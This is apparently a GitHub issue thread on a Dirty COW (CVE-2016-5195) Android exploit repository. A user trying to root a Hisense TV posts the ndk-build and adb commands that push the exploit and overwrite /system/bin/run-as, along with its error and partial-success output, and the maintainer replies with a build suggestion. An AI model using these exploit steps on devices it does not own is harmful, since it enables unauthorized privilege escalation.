CVE-2016-5195 icon indicating copy to clipboard operation
CVE-2016-5195 copied to clipboard

Published 20 hours ago verified publisher icon timwr

warning: new file size and destination file size differ, ptrace I/O error

Open IanBoyanZhang opened this issue 5 years ago • 2 comments

I am trying to gain limited root access on a Hisense vidaa4 running Android 4.4.2.

Have tried to build using SDK v19 v18 v14.

New file size is always 13788

Thank you

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-18
make[1]: Entering directory `/Users/idefixthegrand/Workspace/CVE-2016-5195'
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory `/Users/idefixthegrand/Workspace/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file pushed. 0.5 MB/s (17884 bytes in 0.034s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
libs/armeabi-v7a/run-as: 1 file pushed. 0.3 MB/s (13788 bytes in 0.041s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (13788) and destination file size (9432) differ

corruption?

[*] size 13788
[*] mmap 0xb6ef4000
[*] currently 0xb6ef4000=464c457f
[*] using ptrace method
[*] madvise = 0xb6ef4000 13788
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error

IanBoyanZhang avatar Nov 08 '18 10:11 IanBoyanZhang

Can you try use armeabi version of run-as? Everything else should be armeabi-v7a

timwr avatar Nov 08 '18 11:11 timwr

Tried to use armeabi run-as

adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'


dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5544) and destination file size (9432) differ

[*] size 9432
[*] mmap 0xb6f0a000
[*] currently 0xb6f0a000=464c457f
[*] using /proc/self/mem method
[*] madvise = 0xb6f0a000 9432
[*] madvise = 0 2
[*] /proc/self/mem 0 0
[*] exploited 0 0xb6f0a000=464c457f

adb shell /system/bin/run-as

uid /system/bin/run-as 2000
setresgid/setresuid failed
uid 2000

Guess I should refer to this issue

Thank you.

IanBoyanZhang avatar Nov 09 '18 00:11 IanBoyanZhang